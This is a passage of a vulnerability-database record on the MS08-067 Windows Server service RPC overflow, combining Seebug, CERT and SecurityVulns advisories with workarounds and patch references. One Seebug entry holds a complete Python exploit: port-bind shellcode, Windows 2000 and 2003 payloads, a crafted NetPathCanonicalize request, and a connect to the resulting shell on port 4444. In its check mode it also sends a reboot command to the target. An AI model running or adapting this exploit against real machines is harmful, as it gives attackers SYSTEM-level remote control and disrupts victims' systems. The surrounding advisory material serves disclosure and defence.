Windows XP SP2\r\nMicrosoft Windows Vista SP1\r\nMicrosoft Windows Vista \r\nMicrosoft Windows Server 2008\r\nMicrosoft Windows Server 2003 SP2\r\nMicrosoft Windows Server 2003 SP1\r\nMicrosoft Windows 2000SP4\r\n \u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u7981\u7528Server\u548cComputer Browser\u670d\u52a1\u3002\r\n* \u5728Windows Vista\u548cWindows Server 2008\u4e0a\uff0c\u963b\u65ad\u53d7\u5f71\u54cd\u7684RPC\u6807\u8bc6\u7b26\u3002\u5728\u547d\u4ee4\u63d0\u793a\u7b26\u4e2d\u8fd0\u884c\u4ee5\u4e0b\u547d\u4ee4\uff1a\r\n \r\n netsh\r\n \r\n\u7136\u540e\u5728netsh\u73af\u5883\u4e2d\u8f93\u5165\u4ee5\u4e0b\u547d\u4ee4\uff1a\r\n\r\n netsh>rpc\r\n netsh rpc>filter\r\n netsh rpc filter>add rule layer=um actiontype=block\r\n netsh rpc filter>add condition field=if_uuid matchtype=equal data=4b324fc8-1670-01d3-1278-5a47bf6ee188\r\n netsh rpc filter>add filter\r\n netsh rpc filter>quit\r\n\r\n* \u5728\u9632\u706b\u5899\u963b\u65adTCP 139\u548c445\u7aef\u53e3\u3002\r\n* \u4f7f\u7528\u4e2a\u4eba\u9632\u706b\u5899\uff0c\u5982Internet\u8fde\u63a5\u9632\u706b\u5899\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS08-067\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nMS08-067\uff1aVulnerability in Server Service Could Allow Remote Code Execution (958644)\r\n\u94fe\u63a5\uff1a<a href=http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx?pf=true target=_blank>http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx?pf=true</a>", "modified": "2008-10-24T00:00:00", "published": "2008-10-24T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-4288", "id": "SSV:4288", "type": "seebug", "title": "Windows Server\u670d\u52a1RPC\u8bf7\u6c42\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff08MS08-067\uff09", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:48:57", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2012-10-15T00:00:00", "published": "2012-10-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-88222", "id": "SSV:88222", "type": "seebug", "title": "Windows ms08-067 \u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "sourceData": "\n #!/usr/bin/env python \r\n# coding=utf-8\r\n\r\nimport struct\r\nimport sys\r\nimport socket\r\nfrom threading import Thread #Thread is imported incase you would like to modify the src to run against multiple targets\r\nfrom urlparse import urlparse\r\ntry:\r\n\tfrom impacket import smb\r\n\tfrom impacket import uuid\r\n\tfrom impacket.dcerpc import dcerpc\r\n\tfrom impacket.dcerpc import transport\r\nexcept ImportError, _:\r\n\tprint 'Install the following library to make this script work'\r\n\tprint 'Impacket : http://oss.coresecurity.com/projects/impacket.html'\r\n\tprint 'PyCrypto : http://www.amk.ca/python/code/crypto.html'\r\n\tsys.exit(1)\r\n\r\nfrom comm import cmdline\r\nfrom comm import generic\r\n\r\npoc_info={\r\n 'VulId' : '0866',\r\n 'Name' : 'Windows ms08-067 \u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e POC',\r\n 'AppName' : 'Windows',\r\n 'AppPowerLink': '',\r\n 'AppVersion' : '',\r\n 'VulType' : 'Buffer Overflow',\r\n 'Desc' : '''''',\r\n 'Author' : ['niubl @ Knowsec'],\r\n 'VulDate' : '2008-10-22',\r\n 'CreateDate' : '2014-01-06',\r\n 'UpdateDate' : '2014-01-06',\r\n 'References' : ['http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250'],\r\n 'Version' : '1',\r\n}\r\nio_info = {\r\n 'URL' : '',\r\n 'Mode' : 'v', \r\n 'Verbose' : False, \r\n 'Error' : '', \r\n 'Status' : 0, \r\n 'Result' : {}\r\n}\r\n\r\n#Portbind shellcode from metasploit; Binds port to TCP port 4444\r\nshellcode_verify = \"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\r\nshellcode_verify += \"\\x29\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\xe9\"\r\nshellcode_verify += \"\\x4a\\xb6\\xa9\\x83\\xee\\xfc\\xe2\\xf4\\x15\\x20\\x5d\\xe4\\x01\\xb3\\x49\\x56\"\r\nshellcode_verify += \"\\x16\\x2a\\x3d\\xc5\\xcd\\x6e\\x3d\\xec\\xd5\\xc1\\xca\\xac\\x91\\x4b\\x59\\x22\"\r\nshellcode_verify += \"\\xa6\\x52\\x3d\\xf6\\xc9\\x4b\\x5d\\xe0\\x62\\x7e\\x3d\\xa8\\x07\\x7b\\x76\\x30\"\r\nshellcode_verify += \"\\x45\\xce\\x76\\xdd\\xee\\x8b\\x7c\\xa4\\xe8\\x88\\x5d\\x5d\\xd2\\x1e\\x92\\x81\"\r\nshellcode_verify += \"\\x9c\\xaf\\x3d\\xf6\\xcd\\x4b\\x5d\\xcf\\x62\\x46\\xfd\\x22\\xb6\\x56\\xb7\\x42\"\r\nshellcode_verify += \"\\xea\\x66\\x3d\\x20\\x85\\x6e\\xaa\\xc8\\x2a\\x7b\\x6d\\xcd\\x62\\x09\\x86\\x22\"\r\nshellcode_verify += \"\\xa9\\x46\\x3d\\xd9\\xf5\\xe7\\x3d\\xe9\\xe1\\x14\\xde\\x27\\xa7\\x44\\x5a\\xf9\"\r\nshellcode_verify += \"\\x16\\x9c\\xd0\\xfa\\x8f\\x22\\x85\\x9b\\x81\\x3d\\xc5\\x9b\\xb6\\x1e\\x49\\x79\"\r\nshellcode_verify += \"\\x81\\x81\\x5b\\x55\\xd2\\x1a\\x49\\x7f\\xb6\\xc3\\x53\\xcf\\x68\\xa7\\xbe\\xab\"\r\nshellcode_verify += \"\\xbc\\x20\\xb4\\x56\\x39\\x22\\x6f\\xa0\\x1c\\xe7\\xe1\\x56\\x3f\\x19\\xe5\\xfa\"\r\nshellcode_verify += \"\\xba\\x19\\xf5\\xfa\\xaa\\x19\\x49\\x79\\x8f\\x22\\xa7\\xf5\\x8f\\x19\\x3f\\x48\"\r\nshellcode_verify += \"\\x7c\\x22\\x12\\xb3\\x99\\x8d\\xe1\\x56\\x3f\\x20\\xa6\\xf8\\xbc\\xb5\\x66\\xc1\"\r\nshellcode_verify += \"\\x4d\\xe7\\x98\\x40\\xbe\\xb5\\x60\\xfa\\xbc\\xb5\\x66\\xc1\\x0c\\x03\\x30\\xe0\"\r\nshellcode_verify += \"\\xbe\\xb5\\x60\\xf9\\xbd\\x1e\\xe3\\x56\\x39\\xd9\\xde\\x4e\\x90\\x8c\\xcf\\xfe\"\r\nshellcode_verify += \"\\x16\\x9c\\xe3\\x56\\x39\\x2c\\xdc\\xcd\\x8f\\x22\\xd5\\xc4\\x60\\xaf\\xdc\\xf9\"\r\nshellcode_verify += \"\\xb0\\x63\\x7a\\x20\\x0e\\x20\\xf2\\x20\\x0b\\x7b\\x76\\x5a\\x43\\xb4\\xf4\\x84\"\r\nshellcode_verify += \"\\x17\\x08\\x9a\\x3a\\x64\\x30\\x8e\\x02\\x42\\xe1\\xde\\xdb\\x17\\xf9\\xa0\\x56\"\r\nshellcode_verify += \"\\x9c\\x0e\\x49\\x7f\\xb2\\x1d\\xe4\\xf8\\xb8\\x1b\\xdc\\xa8\\xb8\\x1b\\xe3\\xf8\"\r\nshellcode_verify += \"\\x16\\x9a\\xde\\x04\\x30\\x4f\\x78\\xfa\\x16\\x9c\\xdc\\x56\\x16\\x7d\\x49\\x79\"\r\nshellcode_verify += \"\\x62\\x1d\\x4a\\x2a\\x2d\\x2e\\x49\\x7f\\xbb\\xb5\\x66\\xc1\\x19\\xc0\\xb2\\xf6\"\r\nshellcode_verify += \"\\xba\\xb5\\x60\\x56\\x39\\x4a\\xb6\\xa9\"\r\n\r\n#Payload for Windows 2000 target\r\npayload_1='\\x41\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00\\x2e\\x00\\x5c\\x00'\r\npayload_1+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\npayload_1+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\npayload_1+='\\x41\\x41'\r\npayload_1+='\\x2f\\x68\\x18\\x00\\x8b\\xc4\\x66\\x05\\x94\\x04\\x8b\\x00\\xff\\xe0'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\x43\\x43\\x43\\x43\\x43\\x43\\x43\\x43'\r\npayload_1+='\\xeb\\xcc'\r\npayload_1+='\\x00\\x00'\r\n\r\n#Payload for Windows 2003[SP2] target\r\npayload_2='\\x41\\x00\\x5c\\x00'\r\npayload_2+='\\x2e\\x00\\x2e\\x00\\x5c\\x00\\x2e\\x00'\r\npayload_2+='\\x2e\\x00\\x5c\\x00\\x0a\\x32\\xbb\\x77'\r\npayload_2+='\\x8b\\xc4\\x66\\x05\\x60\\x04\\x8b\\x00'\r\npayload_2+='\\x50\\xff\\xd6\\xff\\xe0\\x42\\x84\\xae'\r\npayload_2+='\\xbb\\x77\\xff\\xff\\xff\\xff\\x01\\x00'\r\npayload_2+='\\x01\\x00\\x01\\x00\\x01\\x00\\x43\\x43'\r\npayload_2+='\\x43\\x43\\x37\\x48\\xbb\\x77\\xf5\\xff'\r\npayload_2+='\\xff\\xff\\xd1\\x29\\xbc\\x77\\xf4\\x75'\r\npayload_2+='\\xbd\\x77\\x44\\x44\\x44\\x44\\x9e\\xf5'\r\npayload_2+='\\xbb\\x77\\x54\\x13\\xbf\\x77\\x37\\xc6'\r\npayload_2+='\\xba\\x77\\xf9\\x75\\xbd\\x77\\x00\\x00'\r\n\r\nclass SRVSVC_Exploit(Thread):\r\n\tdef __init__(self, target, osver, mode, port=445):\r\n\t\tsuper(SRVSVC_Exploit, self).__init__()\r\n\t\tself.__port = port\r\n\t\tself.target = target\r\n\t\tself.osver = osver\r\n\t\tglobal payload\r\n\t\tif self.osver == 1:\r\n\t\t\tpayload = payload_1\r\n\t\telif self.osver == 2:\r\n\t\t\tpayload = payload_2\r\n\t\t\t\r\n\t\tif mode == 'v':\r\n\t\t\tself.shellcode = shellcode_verify\r\n\t\telif mode == 'a':\r\n\t\t\tself.shellcode = shellcode_verify\r\n\r\n\tdef __DCEPacket(self):\r\n\t\t#print '[-]Initiating connection'\r\n\t\tself.__trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\\\pipe\\\\browser]' % self.target)\r\n\t\tself.__trans.connect()\r\n\t\t#print '[-]connected to ncacn_np:%s[\\\\pipe\\\\browser]' % self.target\r\n\t\tself.__dce = self.__trans.DCERPC_class(self.__trans)\r\n\t\tself.__dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))\r\n\r\n\t\t# Constructing Malicious Packet\r\n\t\tself.__stub='\\x01\\x00\\x00\\x00'\r\n\t\tself.__stub+='\\xd6\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd6\\x00\\x00\\x00'\r\n\t\tself.__stub+=self.shellcode\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41'\r\n\t\tself.__stub+='\\x00\\x00\\x00\\x00'\r\n\t\tself.__stub+='\\x2f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2f\\x00\\x00\\x00'\r\n\t\tself.__stub+=payload\r\n\t\tself.__stub+='\\x00\\x00\\x00\\x00'\r\n\t\tself.__stub+='\\x02\\x00\\x00\\x00\\x02\\x00\\x00\\x00'\r\n\t\tself.__stub+='\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00'\r\n\t\tself.__stub+='\\x5c\\x00\\x00\\x00\\x01\\x00\\x00\\x00'\r\n\t\tself.__stub+='\\x01\\x00\\x00\\x00'\r\n\t\treturn\r\n\r\n\tdef run(self):\r\n\t\tself.__DCEPacket()\r\n\t\tself.__dce.call(0x1f, self.__stub) #0x1f (or 31)- NetPathCanonicalize Operation\r\n\t\t#print '[-]Exploit sent to target successfully...\\n[1]Telnet to port 4444 on target machine...' \r\n\r\ndef main(io_info): \r\n\t'''interface function, io_info is a global io dict'''\r\n\turl = io_info.get('URL','')\r\n\tmode = io_info.get('Mode','v')\r\n\tverbose = io_info.get('Verbose', False)\r\n\theaders_fake = generic.modify_headers(io_info)\r\n\ttarget = urlparse(url).netloc\r\n\tif mode == 'v': # \u4ec5\u68c0\u6d4b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\r\n\t\tcurrent = SRVSVC_Exploit(target, 2, mode)\r\n\t\tcurrent.start()\r\n\t\ttry:\r\n\t\t\taddr = (target, 4444)\r\n\t\t\ts = socket.socket()\r\n\t\t\ts.connect(addr)\r\n\t\t\tdata = s.recv(2000)\r\n\t\t\tdata = data + s.recv(2000)\r\n\t\t\ts.send('shutdown /r /t 0\\x0a')\r\n\t\t\tif 'Microsoft Windows' in data: \r\n\t\t\t\tio_info['Status'] = 1\r\n\t\t\t\tio_info['Result']['VerifyInfo'] = {}\r\n\t\t\t\tio_info['Result']['VerifyInfo']['VerifyInfo'] = target\r\n\t\texcept Exception, e:\r\n\t\t\tif verbose:\r\n\t\t\t\tio_info['Error'] = str(e)\r\n\t\t\t\treturn\r\n\telif mode == 'a':\r\n\t\tcurrent = SRVSVC_Exploit(target, 2, mode)\r\n\t\tcurrent.start()\t\t\r\n\t\ttry:\r\n\t\t\taddr = (target, 4444)\r\n\t\t\ts = socket.socket()\r\n\t\t\ts.connect(addr)\r\n\t\t\tdata = s.recv(2000)\r\n\t\t\tdata = data + s.recv(2000)\r\n\t\t\t#s.send('shutdown /r /t 0\\x0a')\r\n\t\t\tif 'Microsoft Windows' in data: \r\n\t\t\t\tio_info['Status'] = 1\r\n\t\t\t\tio_info['Result']['ShellInfo'] = {}\r\n\t\t\t\tio_info['Result']['ShellInfo']['URL'] = target\r\n\t\t\t\tio_info['Result']['ShellInfo']['Content'] = 'nc host 4444, then you can get a shell'\r\n\t\texcept Exception, e:\r\n\t\t\tif verbose:\r\n\t\t\t\tio_info['Error'] = str(e)\r\n\t\t\t\treturn\t\t\r\nif __name__==\"__main__\":\r\n\tcmdline.main(io_info, usage='', argvs=[])\r\n\tif io_info['Verbose']:\r\n\t\tprint '\\n[*] Init ...\\n'\r\n\tmain(io_info)\r\n\tprint generic.output(io_info)\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-88222", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2019-10-09T19:50:19", "bulletinFamily": "info", "description": "### Overview \n\nA stack buffer overflow vulnerability in the Microsoft Windows Server service may allow a remote, unauthenticated attacker to execute arbitrary code with SYSTEM privileges.\n\n### Description \n\n[MS08-067](<http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx>) includes the following information about the Microsoft Server service:\n\n_The Server service provides RPC support, file print support and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC. _ \nThe Microsoft Server service contains a stack buffer overflow vulnerability in the handling of Remote Procedure Call (RPC) messages. \n \nExploit code for this vulnerability is publicly available, and the vulnerability is being currently exploited in the wild. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to execute arbitrary code with SYSTEM privileges on a vulnerable system. \nCertain versions of malicious code called Conficker or Downadup attempt to exploit this vulnerability. \n \n--- \n \n### Solution \n\nApply the updates referenced in Microsoft Security Bulletin [MS08-067](<http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx>). \n \n--- \n \n**Block or Restrict Access** \n \nBlock access to SMB services (139/tcp, 445/tcp) from untrusted networks such as the Internet. This and additional workarounds are provide in Microsoft Security Bulletin [MS08-067](<http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx>). \n \n--- \n \n### Vendor Information\n\n827267\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ __ Microsoft Corporation\n\nUpdated: November 05, 2008 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nPlease see Microsoft Security Bulletin [MS08-067](<http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx>\n * <http://blogs.technet.com/swi/archive/2008/10/23/More-detail-about-MS08-067.aspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms08-oct.mspx>\n * <http://blogs.msdn.com/sdl/archive/2008/10/22/ms08-067.aspx>\n * <https://www.securecoding.cert.org/confluence/display/seccode/FIO02-C.+Canonicalize+path+names+originating+from+untrusted+sources>\n * <https://www.securecoding.cert.org/confluence/display/seccode/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator>\n\n### Acknowledgements\n\nThanks to Microsoft for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2008-4250](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4250>) \n---|--- \n**Severity Metric:****** | 88.20 \n**Date Public:** | 2008-10-23 \n**Date First Published:** | 2008-10-23 \n**Date Last Updated: ** | 2009-11-02 22:36 UTC \n**Document Revision: ** | 30 \n", "modified": "2009-11-02T22:36:00", "published": "2008-10-23T00:00:00", "id": "VU:827267", "href": "https://www.kb.cert.org/vuls/id/827267", "type": "cert", "title": "Microsoft Server service RPC stack buffer overflow vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:31", "bulletinFamily": "software", "description": "It's possible toexecute code without authentication with RPC request UUID 4b324fc8-1670-01d3-1278-5a47bf6ee188 to browser service via SERVER (LanmanServer) service, TCP/139, TCP/445.\r\nReccomendation is to disable browser service.", "modified": "2008-11-04T00:00:00", "published": "2008-11-04T00:00:00", "id": "SECURITYVULNS:VULN:9380", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9380", "title": "Microsoft Windows code execution", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:28", "bulletinFamily": "software", "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\n National Cyber Alert System\r\n\r\n Technical Cyber Security Alert TA08-297A\r\n\r\n\r\nMicrosoft Windows Server Service RPC Vulnerability\r\n\r\n Original release date: October 23, 2008\r\n Last revised: --\r\n Source: US-CERT\r\n\r\n\r\nSystems Affected\r\n\r\n * Microsoft Windows 2000\r\n * Microsoft Windows XP\r\n * Microsoft Windows Server 2003\r\n * Microsoft Windows Vista\r\n * Microsoft Windows Server 2008\r\n\r\n\r\nOverview\r\n\r\n A vulnerability in the way the Microsoft Windows server service\r\n handles RPC requests could allow an unauthenticated, remote\r\n attacker to execute arbitrary code with SYSTEM privileges.\r\n\r\n\r\nI. Description\r\n\r\n Microsoft has released Microsoft Security Bulletin MS08-067 to\r\n address a buffer oveflow vulnerability in the Windows Server\r\n service. The vulnerability is caused by a flaw in the way the\r\n Server service handles Remote Procedure Call (RPC) requests. For\r\n systems running Windows 2000, XP, and Server 2003, a remote,\r\n unauthenticated attacker could exploit this vulnerability. For\r\n systems running Windows Vista and Server 2008, a remote attacker\r\n would most likely need to authenticate.\r\n\r\n Microsoft Security Bulletin MS08-067 rates this vulnerability as\r\n "Critical" for Windows 2000, XP, and Server 2003. The bulletin also\r\n notes "...limited, targeted attacks attempting to exploit the\r\n vulnerability."\r\n\r\n This vulnerability has been assigned CVE-2008-4250. Further\r\n information is available in a Security Vulnerability & Research\r\n blog entry and US-CERT Vulnerability Note VU#827267.\r\n\r\n\r\nII. Impact\r\n\r\n A remote, unauthenticated attacker could execute arbitrary code or\r\n cause a vulnerable system to crash. Since the Server service runs\r\n with SYSTEM privileges, an attacker could take complete control of\r\n a vulnerable system.\r\n\r\n\r\nIII. Solution\r\n\r\nApply update\r\n\r\n Microsoft has provided updates for this vulnerability in Microsoft\r\n Security Bulletin MS08-067. Microsoft also provides security\r\n updates through the Microsoft Update web site and Automatic\r\n Updates. System administrators should consider using an automated\r\n update distribution system such as Windows Server Update Services\r\n (WSUS).\r\n\r\nDisable Server and Computer Browser services\r\n\r\n Disable the Server and Computer Browser services on Windows systems\r\n that do not require those services. A typical Windows client that\r\n is not sharing files or printers is unlikely to need either the\r\n Server or Computer Browser services. As a best security practice,\r\n disable all unnecessary services.\r\n\r\nRestrict access to server service\r\n\r\n Restrict access to the server service (TCP ports 139 and 445). As a\r\n best security practice, only allow access to necessary network\r\n services.\r\n\r\nFilter affected RPC identifier\r\n\r\n The host firewalls in Windows Vista and Windows Server 2008 can\r\n selectively filter RPC Universally Unique Identifiers (UUID). See\r\n Microsoft Security Bulletin MS08-067 for instructions to filter RPC\r\n requests with the UUID equal to \r\n 4b324fc8-1670-01d3-1278-5a47bf6ee188.\r\n\r\n\r\nIV. References\r\n\r\n * US-CERT Vulnerability Note VU#827267 -\r\n <http://www.kb.cert.org/vuls/id/827267>\r\n\r\n * Microsoft Security Bulletin MS08-067 -\r\n <http://www.microsoft.com/technet/security/Bulletin/\r\n ms08-067.mspx>\r\n\r\n * Microsoft Update - <https://update.microsoft.com/>\r\n\r\n * Windows Update: Automatic Update\r\n <http://www.microsoft.com/windows/downloads/windowsupdate/\r\n automaticupdate.mspx>\r\n\r\n * Windows Server Update Services (WSUS) Home -\r\n <http://technet.microsoft.com/en-us/wsus/default.aspx>\r\n\r\n * CVE-2008-4250 -\r\n <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250>\r\n\r\n * More detail about MS08-067, the out-of-band netapi32.dll\r\n security update -\r\n <http://blogs.technet.com/swi/archive/2008/10/23/\r\n More-detail-about-MS08-067.aspx>\r\n\r\n\r\n ____________________________________________________________________\r\n\r\n The most recent version of this document can be found at:\r\n\r\n <http://www.us-cert.gov/cas/techalerts/TA08-297A.html>\r\n ____________________________________________________________________\r\n\r\n Feedback can be directed to US-CERT Technical Staff. Please send\r\n email to <cert@cert.org> with "TA08-297A Feedback VU#827267" in\r\n the subject.\r\n ____________________________________________________________________\r\n\r\n For instructions on subscribing to or unsubscribing from this\r\n mailing list, visit <http://www.us-cert.gov/cas/signup.html>.\r\n ____________________________________________________________________\r\n\r\n Produced 2008 by US-CERT, a government organization.\r\n\r\n Terms of use:\r\n\r\n <http://www.us-cert.gov/legal.html>\r\n ____________________________________________________________________\r\n\r\n\r\nRevision History\r\n\r\n October 23, 2008: Initial release\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.5 (GNU/Linux)\r\n\r\niQEVAwUBSQDoMnIHljM+H4irAQJaYwgAwTlLruLijREi3IjEanhKH9DOFykxE9Mr\r\nMmt4yurwHjt+TPMyqgzPGuk44xd5ySPTm0qIszwIXSiIDYS50PNhg0atluiQeLVC\r\nToFNdd6W++75upBIQMkYUENj4GHExDcMOs0uMjlIcjqUGIERlqRHnkIWDvMU0ouc\r\npKnx4p50IimdVMlabHbZ1AiL1tRWFgsc0IM2FExpyVpHKXy6dCXjMbfV5pPgB23l\r\n0CaRk5ENONr9BPDx0nN/1hwS6cQ5vaU7/i6KH1GL+hPkAAEvns002FUHPoUiaj2W\r\nZ415eNR3psa9vDU0hsajsqySbXcgUSSW12M0FxRb2DP5HSxriXi0IQ==\r\n=vk3f\r\n-----END PGP SIGNATURE-----", "modified": "2008-10-24T00:00:00", "published": "2008-10-24T00:00:00", "id": "SECURITYVULNS:DOC:20744", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20744", "title": "US-CERT Technical Cyber Security Alert TA08-297A -- Microsoft Windows Server Service RPC Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:28", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS08-067 \u2013 Critical\r\nVulnerability in Server Service Could Allow Remote Code Execution (958644)\r\nPublished: October 23, 2008\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis security update resolves a privately reported vulnerability in the Server service. The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.\r\n\r\nThis security update is rated Critical for all supported editions of Microsoft Windows 2000, Windows XP, Windows Server 2003, and rated Important for all supported editions of Windows Vista and Windows Server 2008. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThe security update addresses the vulnerability by correcting the way that the Server service handles RPC requests. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation. Microsoft recommends that customers apply the update immediately.\r\n\r\nKnown Issues. None\r\nTop of sectionTop of section\r\nAffected and Non-Affected Software\r\n\r\nThe following software have been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by this Update\r\n\r\nMicrosoft Windows 2000 Service Pack 4\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-040\r\n\r\nWindows XP Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-040\r\n\r\nWindows XP Service Pack 3\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows XP Professional x64 Edition\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-040\r\n\r\nWindows XP Professional x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 Service Pack 1\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-040\r\n\r\nWindows Server 2003 Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 x64 Edition\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-040\r\n\r\nWindows Server 2003 x64 Edition Service Pack 2\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Server 2003 with SP1 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nMS06-040\r\n\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nCritical\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista and Windows Vista Service Pack 1\r\n\t\r\n\r\nRemote Code Execution\r\n\t\r\n\r\nImportant\r\n\t\r\n\r\nNone\r\n\r\nWindows Vista x64 Edition and Windows Vista x64 Edition Service Pack 